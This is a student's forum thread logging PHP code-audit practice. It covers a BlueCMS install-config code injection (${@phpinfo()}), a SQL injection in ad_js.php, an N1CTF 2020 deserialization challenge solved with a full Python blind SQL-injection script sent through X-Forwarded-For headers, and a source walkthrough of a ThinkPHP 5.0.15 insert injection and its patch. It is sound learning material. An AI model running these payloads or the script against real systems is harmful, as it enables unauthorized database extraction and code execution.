代码审计萌新挖坑记

konjac

开学了，挖个初学代码审计的坑，先开始学习审php【随时鸽】

大致有以下计划【如果有更好的建议，希望留言】

学习phpstrom+xdebug的调试技巧

学习php cms常见的漏洞 -> 骚技巧/骚漏洞

学习调试各种小型cms已知漏洞（掌握技巧和调试的感觉）

调试大型框架的已知漏洞【ThinkPhp？yii？laravel？】

自己尝试挖洞

0x01:搭建phpstrom+xdebug的调试环境

虚拟机centos+宝塔+实体机本地phpstrom+xdebug

.前言

1.由于我中途会挖到一些很愚蠢的坑【不认真看文档，或者漏了一些细节导致的坑】。所以可能会发现此记录文会有跳步的可能。
2.选择此环境是因为我试过别的搭配，最终可能觉得这个最适合我。比如虚拟机发现已经装好了一台centos，2333

选择宝塔的原因

1.时间就是生产力，虽然真的很讨厌宝塔(安全性太好了，~~这里严重鄙视宝塔一哥强总。~~) 宝塔提供了方便的一键安装一键切换。
2.学校的大内网环境下。即使不在内网环境，也不应该让一个web+中间件+数据库的环境存在于实体机上面，这不是一个搞安全的人应该有的。

对于过于基础的东西，请自行谷歌，这里跳过。

1.环境的搭建

宝塔安装

wget -O install.sh http://download.bt.cn/install/install-ubuntu_6.0.sh && sudo bash install.sh

随后在宝塔面板安装lamp

在实体机安装phpstorm（新生可以通过华师的mail.scnu.edu.cn申请一个教育邮箱然后去官网申请免费激活xxxstrom全家桶）

参考：PhpStorm Xdebug远程调试环境搭建原理分析及问题排查

最终实现的效果是虚拟机centos运行php环境代码。phpstorm通过ftp 方式自动实时更改调试远程代码
配置的坑有几个，可以和我探讨一下233

0x02.开始审计

[ ] 知识背景
- [x] 一定的hello world底子
- [x] 对于top10漏洞有熟悉的了解
- [x] 了解常见的php漏洞
  开始找点审计感觉
  1.前言

审计选择的是bluecms，因为我可能对于mvc还有一点敬畏，虽然我已经明白其中的原理，但是脑子有点笨。然后新手建议选择网上文章多的，资料多的cms。其实bluecms已经是一个倒闭的cms了。估计也不会有站长用这种很垃圾的cms。源码一开始谷歌找了一份，但是有bug。然后去ichunqiu的论坛找到了一份。如果有人要可以留言。

####对于一个cms，那么我选择的方法是跟着功能点走。那么第一步肯定就是安装了。

 if(file_exists(BLUE_ROOT.'data/install.lock')){
 	install_showmsg('您已经安装过本系统，如果想重新安装，请删除data目录下install.lock文件', '../index.php');
 }

可以看到有这样子的代码在install/index.php里面，我们使用 ctrl+shif+f全局搜索看看（或者ctrl+左键直接跳转）

#install_showmsg —> install/include/common.fun.php
 function install_showmsg($msg,$gourl='goback', $is_write = false)
 {
 	global $install_smarty;
 	$install_smarty->assign("msg",$msg);
 	$install_smarty->assign("gourl",$gourl);
 	$install_smarty->display("showmsg.htm");
 	exit(); #看到个exit就可以下一步了，  然后也没有可控的点，打扰了。
 }

But，其实这个cms已经是安装好了的，但是不知道为何他的锁data/install.lock却没有生成，所以也是抱着这个疑问开始看install.php
别的代码似乎没有什么大问题
当看到

...
 elseif($act == 'step4'){
 	$dbhost = isset($_POST['dbhost']) ? trim($_POST['dbhost']) : '';
 	$dbname = isset($_POST['dbname']) ? trim($_POST['dbname']) : '';
 	$dbuser = isset($_POST['dbuser']) ? trim($_POST['dbuser']) : '';
 	$dbpass = isset($_POST['dbpass']) ? trim($_POST['dbpass']) : '';
 	$pre  = isset($_POST['pre']) ? trim($_POST['pre']) : 'blue_';
 	$admin_name = isset($_POST['admin_name']) ? trim($_POST['admin_name']) : '';
    $admin_pwd = isset($_POST['admin_pwd']) ? trim($_POST['admin_pwd']) : '';
    $admin_pwd1 = isset($_POST['admin_pwd1']) ? trim($_POST['admin_pwd1']) : '';
    $admin_email = isset($_POST['admin_email']) ? trim($_POST['admin_email']) : '';
    $cookie_hash = isset($_POST['cookie_hash']) ? trim($_POST['cookie_hash']) : '';

...
	$content = '<?'."php\n";
    $content .= "\$dbhost   = \"$dbhost\";\n\n";
    $content .= "\$dbname   = \"$dbname\";\n\n";
    $content .= "\$dbuser   = \"$dbuser\";\n\n";
    $content .= "\$dbpass   = \"$dbpass\";\n\n";
    $content .= "\$pre    = \"$pre\";\n\n";
	$content .= "\$cookiedomain = '';\n\n";
	$content .= "\$cookiepath = '/';\n\n";
    $content .= "define('BLUE_CHARSET','".BLUE_CHARSET."');\n\n";
    $content .= "define('BLUE_VERSION','".BLUE_VERSION."');\n\n";
    $content .= '?>';

    $fp = @fopen(BLUE_ROOT . 'data/config.php', 'wb+');
    if (!$fp){
        install_showmsg('打开配置文件失败');
    }
    if (!@fwrite($fp, trim($content))){
    	install_showmsg('写入配置文件失败');
    }
    @fclose($fp);

这里没有做任何的处理就写入文件那么就应该有一个getshell 的地方
一开始的payload是

pre=blue_";phpinfo();#

后来发现双引号会给转义，我还以为我记错了trim的作用特意去看了官方文档，还有本地调试发现都是不会转义的，猛的想起来应该是全局的包含文件在作妖。一看果然是 - -

#include/common.inc.php
....
if(!get_magic_quotes_gpc())
{
	$_POST = deep_addslashes($_POST);
	$_GET = deep_addslashes($_GET);
	$_COOKIES = deep_addslashes($_COOKIES);
	$_REQUEST = deep_addslashes($_REQUEST);
}
...

想了很久都想不到怎么办，跑去问了一下广西老大哥。随手就告诉了我一个poc- -

${@phpinfo()}

那么第一个getshell的地方就出来了

然后就开始审计为何没有生成lock锁了

elseif($act == 'step5')
{
        print_r("我要进来啦"); 
	include dirname(__FILE__) . '/../include/common.inc.php';#通过调试跟进 发现是这行代码报错导致没有继续执行代码下去
	print_r("include success"); #人工断点2333
	include BLUE_ROOT . 'admin/include/common.fun.php';

	update_data_cache();
	update_pay_cache();
	print_r('asd');
	print_r(BLUE_ROOT.'data/');
	if(is_writable(BLUE_ROOT.'data/'))
	{
		print_r("come");
		$fp = @fopen(BLUE_ROOT.'data/install.lock', 'wb+');
		fwrite($fp, 'OK');
		fclose($fp);
	}

 	$install_smarty->display('step5.htm');
}

然后跟进报错的代码一直跟进到

#include/common.inc.php.65
require(BLUE_ROOT.'include/smarty/Smarty.class.php');

发现就是这个代码惹的祸继续跟进
发现一直到
这里都是可以执行的但是包含完这个文件 php就结束执行了想不懂为什么。
然后这个时候我就把这行代码额外拉出去一个test.php里面执行。更加方便的调试这时候就奇怪了，他可以完全的执行下去。
同样的代码。为什么原本的index.php不行，一个可以呢。思考了一下，本着计算机一定不会出错，出错一定是人的原则想了一下。那么一定就是index.php就是安装文件之前有代码在作怪然后就看回来之前的代码，顿时就领悟了

这tm人才同一个文件包含了2次，

#test.php
<?php
define('IN_BLUE', true);
require_once(dirname(__FILE__) . '/include/common.inc.php');
include dirname(__FILE__) . '/../include/common.inc.php';
print_r("success");

然后放到我们的test.php去尝试是不是这样子会报错。果然success就不漏出来了，通过跟进应该是这样子的
包含common.inc.php -> require(BLUE_ROOT.'include/smarty/Smarty.class.php'); 然后里面的class类smarty给包含了2次就执行失败了，可以理解为一个php文件包含了2个同名的smarty类当然报错呀。
此处鄙视作者竟然没有调试。。。
所以这也是install.lock没有成功创建的原因。那么我就把这个代码修复了一下

#before:include/common.inc.php.65
require(BLUE_ROOT.'include/smarty/Smarty.class.php');
#after:include/common.inc.php.65
require_once(BLUE_ROOT.'include/smarty/Smarty.class.php');

然后这个重装漏洞给修好了 - -

现在我们重新来看一下这个bluecms结构

admin #后台
api #接口
data #配置文件
images #图片
include #文件包含
      fckeditor #编辑器
      payment #支付插件
      smarty #第三方
 install #安装
 uc_client #用户中心
 还有一些杂七杂八的php文件 慢慢看

一个一个php开始看
第一个是ad_js.php

$ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : '';
if(empty($ad_id))
{
	echo 'Error!';
	exit();
}

$ad = $db->getone("SELECT * FROM ".table('ad')." WHERE ad_id =".$ad_id);

明显的sql注入网上文章都在说这个我们跳过。

ps:我觉得这个是故意留的后门- - 虽然他用了，但是我有看user.php 整个user.php sql地方都写的基本没毛病这个40行不到的php一个这么明显的注入。

发现12点了，很晚了先睡觉，今天就先这么多了逃);太菜了

0x0001

以我多年折腾各种 PHP 环境的经验，环境搭建更建议用 Docker 来搞，然后用 Docker Compose 方便编排需要的服务（数据库、静态文件/反向代理服务器、缓存等等），配合 VSCode Remote-SSH 插件直接连虚拟机远程开发。这样受宿主机环境影响更小一些，也可摆脱对宝塔的依赖，折腾的结果可以复用。

目前 0xFFFF 的本地开发环境我就是这么干的，开了个云服务器来专门做开发机，本地调试的话用 whistle + VSCode 自动建的 ssh 隧道转发端口。（这周发现用远程 Linux 机器来打 CTF 也特别适合）

相关配置可以参考这个：zgq354/flarum-docker-env

日常在 VSCode 开发 PHP 可以装一个 PHP Intelephense 插件，基本的代码跳转和提示都支持了，就不用再依赖 PHPStorm。xdebug 也可在容器里配置，具体可以参考 0xffff-env 里面 xdebug 分支的 php-fpm 的 Dockerfile。

不得不吐槽，PHP 相关的教程资料实在是非常乱，PHP 相关的安全问题很多时候也是在这个背景下产生的~（我也因此学到不少奇奇怪怪的细节哈哈

konjac

0x0001 这似乎是一个很好的建议，我会记录下来，待我有空折腾的时候更换环境。现在先开始审计

konjac

2020/10/16 今天有课和作业，但是还是在空余时间看了很多文件，找了几个可控点，但是还是有限制，没有找到利用点太菜了，不过还是get了很多知识，顺便想问一下 php的substr参数长度上限多少,substr($str,'.'); 这个$str 存在长度溢出的可能吗，想看一下他的函数是怎么写的，如果没有大手子讲，我就去看看php的源码2333（想偷懒）

konjac

2020/10/18

困扰一年的支气管炎最近加重了，今天看了一天的医生，没有学习的我，好慌啊，回来看到n1ctf 已经开始一天了赶快看看web题

SignIn

1.一个很明显的反序列化题目，近几年的出题趋势。这里可以当作签到题 orz。

#题目
<?php 
class ip {
    public $ip;
    public function waf($info){
    }
    public function __construct() {
        if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
            $this->ip = $this->waf($_SERVER['HTTP_X_FORWARDED_FOR']);
        }else{
            $this->ip =$_SERVER["REMOTE_ADDR"];
        }
    }
    public function __toString(){
        $con=mysqli_connect("localhost","root","********","n1ctf_websign");
        $sqlquery=sprintf("INSERT into n1ip(`ip`,`time`) VALUES ('%s','%s')",$this->waf($_SERVER['HTTP_X_FORWARDED_FOR']),time());
        if(!mysqli_query($con,$sqlquery)){
            return mysqli_error($con);
        }else{
            return "your ip looks ok!";
        }
        mysqli_close($con);
    }
}

class flag {
    public $ip;
    public $check;
    public function __construct($ip) {
        $this->ip = $ip;
    }
    public function getflag(){
    	if(md5($this->check)===md5("key****************")){
    		readfile('/flag');
    	}
        return $this->ip;
    }
    public function __wakeup(){
        if(stristr($this->ip, "n1ctf")!==False)
            $this->ip = "welcome to n1ctf2020";
        else
            $this->ip = "noip";
    }
    public function __destruct() {
        echo $this->getflag();
    }

}
if(isset($_GET['input'])){
    $input = $_GET['input'];
	unserialize($input);
}

我们学习一下反序列化
(http://www.lmxspace.com/2018/05/03/php-unserialize-%E5%88%9D%E8%AF%86/)这是我看到讲的最好的blog文章
贴一些重要的知识点

#常用魔术方法及触发条件
__wakeup() //使用unserialize时触发
__sleep() //使用serialize时触发
__destruct() //对象被销毁时触发
__call() //在对象上下文中调用不可访问的方法时触发
__callStatic() //在静态上下文中调用不可访问的方法时触发
__get() //用于从不可访问的属性读取数据
__set() //用于将数据写入不可访问的属性
__isset() //在不可访问的属性上调用isset()或empty()触发
__unset() //在不可访问的属性上使用unset()时触发
__toString() //把类当作字符串使用时触发,返回值需要为字符串
__invoke() //当脚本尝试将对象调用为函数时触发
#类型字母详解:
a - array  
b - boolean  
d - double  
i - integer
o - common object
r - reference
s - string
C - custom object
O - class
N - null
R - pointer reference
U - unicode string

然后跟着这篇文章学着调试一下最简单的几个demo。

1点25了先逃): 太菜了吧

因为我觉得属于代码审计就没有另外开一个帖子。
昨天星期天，肝了好久这题，昨晚搞到2点多才做出来，思路其实都对了，但是就是坑多，不细心orz，太菜了。

那么写一下这题的思路

if(isset($_GET['input'])){
    $input = $_GET['input'];
	unserialize($input);
}

这里很明显的反序列化漏洞
随后就是看给的类
flag类就很明显了问题就在于要通过构造check函数对象让check 等于这个md5后的key 用了三个等于号，那题目也叫sign in，所以看上面第一个类，有一个sql的插入操作，其中严重鄙视一下出题者function waf好歹也加一个点点点啊，我还以为是空函数，白费时间，这题粗略过一下，作业太多了，以后有空再补充
构造序列化对象令$_GET['input'] -> flag(ip->ip()) 这样子flag销毁时就会触发__destruct()->getflag()->这时候ip指向了ip这个类触发tostring。就可以进行注入，注入得fuzz一下waf的check 内容（再次鄙视）
贴一个写的脚本非常的nt - -很多东西重复了，但是懒得优化了，能用就行。但是大部分代码是通过https://github.com/h3xstream/http-script-generator 这个burp插件生成的所以，我就写了一个二分法去跑

import requests

session = requests.Session()
startnum=1
expkey=44
paramsGet = {"input":"O:4:\"flag\":1:{s:2:\"ip\";O:2:\"ip\":0:{}} "}
tablename="注入的内容有："
min=1
max=150
proxy={
    'http':'127.0.0.1:8080'
}

def getDbs(startnum,expkey):
    headers = {
        "Cache-Control": "max-age=0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36",
        "Connection": "close",
        "x-forwarded-for": "127.0.0.1'  and updatexml( 1, if((SELECT ascii(mid(group_concat(schema_name),"+str(startnum)+",1)) FROM information_schema.schemata) >" + str(
            expkey) + ",1,concat(0x3a, DATABASE())),1 ) and '1'='1",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh,zh-TW;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6"
    }
    response = session.get("http://101.32.205.189/index.php", params=paramsGet, headers=headers,proxies=proxy)
    #print(response.text)
    if('<code>welcome to n1ctf2020</code>' in response.text):
        return True;
    else:
        return False;

def getTable(startnum,expkey):
    headers = {
        "Cache-Control": "max-age=0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36",
        "Connection": "close",
        "x-forwarded-for": "127.0.0.1'  and updatexml( 1, if((SELECT ascii(mid(group_concat(table_name)," + str(
            startnum) + ",1)) FROM information_schema.tables WHERE table_schema = DATABASE()) >" + str(
            expkey) + ",1,concat(0x3a, DATABASE())),1 ) and '1'='1",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh,zh-TW;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6"
    }
    response = session.get("http://101.32.205.189/index.php", params=paramsGet, headers=headers,proxies=proxy)
    #print(response.text)
    if('<code>welcome to n1ctf2020</code>' in response.text):
       # print('True')
        return True;
    else:
        return False;
def getColumns(startnum,expkey):
    headers = {
        "Cache-Control": "max-age=0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36",
        "Connection": "close",
        "x-forwarded-for": "127.0.0.1'  and updatexml( 1, if((SELECT ascii(mid(group_concat(column_name),"+str(startnum)+",1)) FROM information_schema.columns WHERE table_schema=DATABASE() and table_name='n1key') >" + str(
            expkey) + ",1,concat(0x3a, DATABASE())),1 ) and '1'='1",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh,zh-TW;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6"
    }
    response = session.get("http://101.32.205.189/index.php", params=paramsGet, headers=headers,proxies=proxy)

    if('<code>welcome to n1ctf2020</code>' in response.text):
        return True;
    else:
        return False;
def getFlag(startnum,expkey):
    headers = {
        "Cache-Control": "max-age=0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36",
        "Connection": "close",
        "x-forwarded-for": "127.0.0.1'  and updatexml( 1, if((SELECT ascii(mid(group_concat(`key`),"+str(startnum)+",1)) FROM n1key) >" + str(
            expkey) + ",1,concat(0x3a, DATABASE())),1 ) and '1'='1",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh,zh-TW;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6"
    }
    response = session.get("http://101.32.205.189/index.php", params=paramsGet, headers=headers,proxies=proxy)

    if('<code>welcome to n1ctf2020</code>' in response.text):
        return True;
    else:
        return False;


while startnum<300:
    expkey=int((max+min)/2)

    if(getFlag(startnum,expkey)==True):
        max = expkey
    else:
        min = expkey
    if((max-1)==min):
        tablename += chr(max)
        print(tablename)
        startnum+=1
        min = 44
        max = 122

最后能跑出key的值，然后再构造poc就懂啦。啰嗦了很多，可能有点乱，只要去看多一些反序列化的文章和本地调试一下就懂了，还有就是需要一些报错注入的基础知识
去做作业了逃)：

konjac

最近几天一直在看资料，和审计，没有什么好的产出
但是对于一些cms/系统，我发现自己有一个问题，基本都是在看sql注入和一些文件上传和执行命令的函数，就不会看别的函数漏洞点了，也一直在反思。所以觉得需要调整一下，通过一些ctf的php代码题来提升对php的认识。
此外，有一些基本的cms也没审计出漏洞，主要还是觉得自己调的洞太少了。

konjac

顺便想问一下。有什么工具或者插件可以实现生成函数的流程图吗
比如

<?php
function A(){
B($poc);
}
....
code
.....
function B(){
C($poc2);
}
....
code
....
function C(){
eval($poc3);
}

然后已知C有漏洞然后自动通过C来定位流程图得到 A->B->C；
或者通过A的可控点$poc来进行跟踪 A->B->C
虽然有一些编辑器有这些功能但是似乎还是需要人工一个一个去跳转或者全局搜索，请问有类似我这个需求的插件吗

0x0001

konjac 画图的话可以考虑 graphviz，关键就是怎么搞个语法解析了🤔

konjac

0x0001 这是个大坑orz

0x0001

konjac 编译原理搞起！语法分析啥的，记得 php 用的语法分析器是 bison，或许可以基于它定制一波

konjac

tp

5.0.15注入

安装：

composer create-project --prefer-dist topthink/think=5.0.15 tpdemo

然后修改tpdemo下的composer.json中以下的内容

"require": {
    "php": ">=5.4.0",
    "topthink/framework": "5.0.15"
}

修改完成后执行composer update。

我们接着创建一个具有漏洞点的文件

# application/index/controller/Index.php 
<?php
namespace app\index\controller;

class Index
{
    public function index()
    {
        $username = request()->get('username/a');
        db('users')->insert(['username' => $username]);
        return 'Update success';
    }
}

记得去 application/database.php 配置数据库链接，然后开启application/config.php 中的debug和trace

在mysql中创建数据库

create database tpdemo;
use tpdemo;
create table users(
	id int primary key auto_increment,
	username varchar(50) not null
);

万事俱备后，我们看看触发

![image-20201028131830956](C:\Users\konjac\AppData\Roaming\Typora\typora-user-images\image-20201028131830956.png)

可以看到的确是注入出了 user,

注意：这里其实是盲注因为是开启了debug才看到报错。

那么我们如何定位一个已知的漏洞点呢。我们可以去官网看更新.看之前先跟踪一下这个数据库执行的过程。

![image-20201028184037777](C:\Users\konjac\AppData\Roaming\Typora\typora-user-images\image-20201028184037777.png)

这里下个断点，通过跟踪可以知道流程图如下

#tpdemo/thinkphp/library/think/db/Query.php

![image-20201028191223471](C:\Users\konjac\AppData\Roaming\Typora\typora-user-images\image-20201028191223471.png)

其中第一个是处理sql查询的，跟进以后大概就是处理查询的参数

        $options = $this->parseExpress();

![image-20201028215106350](C:\Users\konjac\AppData\Roaming\Typora\typora-user-images\image-20201028215106350.png)

        $data    = array_merge($options['data'], $data);#数组合并

        $sql = $this->builder->insert($data, $options, $replace);

这里就是我们的重头戏，可以看到

他调用了builder的insert方法。我一开始不知道这个builder哪里来的。用了几个编辑器的自动跳转都是来到这里。然后我就人肉看query是怎么实现的

    public function __construct(Connection $connection = null, $model = null)
    {
        $this->connection = $connection ?: Db::connect([], true);
        $this->prefix     = $this->connection->getConfig('prefix');
        $this->model      = $model;
        // 设置当前连接的Builder对象
        $this->setBuilder();
    }
    protected function setBuilder()
    {
        $class         = $this->connection->getBuilder();
        $this->builder = new $class($this->connection, $this);
    }
    public function getBuilder()
    {
        if (!empty($this->builder)) {
            return $this->builder;
        } else {
            return $this->getConfig('builder') ?: '\\think\\db\\builder\\' . ucfirst($this->getConfig('type'));
        }
    }

所以就可以知道builder是

tpdemo/thinkphp/library/think/db/Builder.php

那么我们目光来到Builder.php的

public function insert(array $data, $options = [], $replace = false)
{
    // 分析并处理数据
    $data = $this->parseData($data, $options);
    if (empty($data)) {
        return 0;
    }
    $fields = array_keys($data);
    $values = array_values($data);

    $sql = str_replace(
        ['%INSERT%', '%TABLE%', '%FIELD%', '%DATA%', '%COMMENT%'],
        [
            $replace ? 'REPLACE' : 'INSERT',
            $this->parseTable($options['table'], $options),
            implode(' , ', $fields),
            implode(' , ', $values),
            $this->parseComment($options['comment']),
        ], $this->insertSql);

    return $sql;
}

看到传进来的sql会交给parseData处理，跟进parseData看看

protected function parseData($data, $options)
    {
        if (empty($data)) {
            return [];
        }

        // 获取绑定信息
        $bind = $this->query->getFieldsBind($options['table']);
        if ('*' == $options['field']) {
            $fields = array_keys($bind);
        } else {
            $fields = $options['field'];
        }

        $result = [];
        foreach ($data as $key => $val) {
            $item = $this->parseKey($key, $options);
            if (is_object($val) && method_exists($val, '__toString')) {
                // 对象数据写入
                $val = $val->__toString();
            }
            if (false === strpos($key, '.') && !in_array($key, $fields, true)) {
                if ($options['strict']) {
                    throw new Exception('fields not exists:[' . $key . ']');
                }
            } elseif (is_null($val)) {
                $result[$item] = 'NULL';
            } elseif (is_array($val) && !empty($val)) {
                switch ($val[0]) {
                    case 'exp':
                        $result[$item] = $val[1];
                        break;
                    case 'inc':
                        $result[$item] = $this->parseKey($val[1]) . '+' . floatval($val[2]);
                        break;
                    case 'dec':
                        $result[$item] = $this->parseKey($val[1]) . '-' . floatval($val[2]);
                        break;
                }
            } elseif (is_scalar($val)) {
                // 过滤非标量数据
                if (0 === strpos($val, ':') && $this->query->isBind(substr($val, 1))) {
                    $result[$item] = $val;
                } else {
                    $key = str_replace('.', '_', $key);
                    $this->query->bind('data__' . $key, $val, isset($bind[$key]) ? $bind[$key] : PDO::PARAM_STR);
                    $result[$item] = ':data__' . $key;
                }
            }
        }
        return $result;
    }

#sql處理
	if (empty($data)) {
            return [];
        }
        // 获取绑定信息
        $bind = $this->query->getFieldsBind($options['table']);

        if ('*' == $options['field']) {
            $fields = array_keys($bind);
        } else {
            $fields = $options['field'];
        }
        $result = [];

待补充。我其实已经看到漏洞生成的原因，但是在看修复方案的写法原因和exp过滤和一些奇奇怪怪的东西。。在看tp的过滤源码，我看了很多网上的分析文章，其实都是照搬，或者没有分析全面，有很多我觉得关键的地方都没有说，不想像他们那样子

konjac

今天体测了，回来花了点时间看了看，终于把所有细枝末节的东西都弄懂了。我们全部重新开始看看。
首先理解一下官方文档里面，
thinkphp5.0.5+以上版本封装的data、inc、dec和exp方法是干嘛的，这样子能更好的去理解这个漏洞的原因。而不是知道一些表面的东西。
V5.0.5+以上版本封装的data、inc、dec和exp方法属于链式操作方法，可以配合update使用（官方推荐用法）。
下面举个例子说明用法：

Db::table('data')
    ->where('id',1)
    ->inc('read')
    ->dec('score',3)
    ->exp('name','UPPER(name)')
    ->update();

类似的助手函数
// 更新数据表中的数据
db('user')->where('id',1)->update(['name' => 'thinkphp']);
// 更新某个字段的值
db('user')->where('id',1)->setField('name','thinkphp');
// 自增 score 字段
db('user')->where('id', 1)->setInc('score');
// 自减 score 字段
db('user')->where('id', 1)->setDec('score');

那么我们可以再看回这个漏洞链

class Index
{
    public function index()
    {

        $username = request()->get('username1/a');#先看这里
        db('users')->insert(['username' => $username]);
        return 'Update success';
    }
}

request->get()获取参数然后get方法里调用了input

    public function get($name = '', $default = null, $filter = '')
    {
        if (empty($this->get)) {
            $this->get = $_GET;
        }
        if (is_array($name)) {
            $this->param      = [];
            return $this->get = array_merge($this->get, $name);
        }
        return $this->input($this->get, $name, $default, $filter);
    }

input跟进

      public function input($data = [], $name = '', $default = null, $filter = '')
    {
...省略代码
        return $this->filterExp($value);
    }

跟进filterExp

     public function filterExp(&$value)
    {
        // 过滤查询特殊字符
        if (is_string($value) && preg_match('/^(EXP|NEQ|GT|EGT|LT|ELT|OR|XOR|LIKE|NOTLIKE|NOT LIKE|NOT BETWEEN|NOTBETWEEN|BETWEEN|NOTIN|NOT IN|IN)$/i', $value)) {
            $value .= ' ';
        }
        // TODO 其他安全过滤
    }

看到如果有exp会加空格。记住这个点
这个我们就跟进到这里，别的处理都不太有关系了，回到我们的漏洞链。

class Index
{
    public function index()
    {

        $username = request()->get('username1/a');
        db('users')->insert(['username' => $username]);#看这个，
        return 'Update success';
    }
}

看第二行调用了insert 跟进

    public function insert(array $data = [], $replace = false, $getLastInsID = false, $sequence = null)
    {
        // 分析查询表达式
        $options = $this->parseExpress();
        $data    = array_merge($options['data'], $data);
        // 生成SQL语句
        $sql = $this->builder->insert($data, $options, $replace);

前面2行是调整sql的语句，问题不大，看第三行，调用的是think目录下的db目录中的builder方法，这里用了自动加载，
跟进Builder的insert方法

    public function insert(array $data, $options = [], $replace = false)
    {
        // 分析并处理数据
        $data = $this->parseData($data, $options);
省略代码...

跟进parseData

elseif (is_array($val) && !empty($val)) {
                switch ($val[0]) {
                    case 'exp':
                        $result[$item] = $val[1];
                        break;
                    case 'inc':
                            $result[$item] = $this->parseKey($val[1]) . '+' . floatval($val[2]);

                        break;
                    case 'dec':
                        $result[$item] = $this->parseKey($val[1]) . '-' . floatval($val[2]);
                        break;
                }

别的代码基本可以忽略，因为其实都没有怎么影响我们输入的值，看到这里其实直接拼接了我们输入的参数，parsekey没有做过滤，floatval则是php内置的函数，具体作用可以看看官方文档，这里不过多叙述，所以注入点只有val[1]。随后后面的就是过程就是执行我们的sql语句了，其中前面提到，第一个request->get()会对传入的参数中带有exp的会加exp+空格的处理，所以这里是不能命中case`exp` 这个规则的，所以exp是没有注入，而inc、dec都有注入。

我们看看官方的更新方法，就是控制$val[1]，也就是注入点，既键值必须对应传入的更新值，我一开始不太理解这个更新的方法，觉得限制了开发的写法，但是其实还是没毛病的。


        case 'inc':
                        //$result[$item] = $this->parseKey($val[1]) . '+' . floatval($val[2]);
                        if ($key == $val[1]) {
                            $result[$item] = $this->parseKey($val[1]) . '+' . floatval($val[2]);
                        }
                        break;
                    case 'dec':
                        //$result[$item] = $this->parseKey($val[1]) . '-' . floatval($val[2]);
                        if ($key == $val[1]) {
                            $result[$item] = $this->parseKey($val[1]) . '-' . floatval($val[2]);
                        }
                        break;
`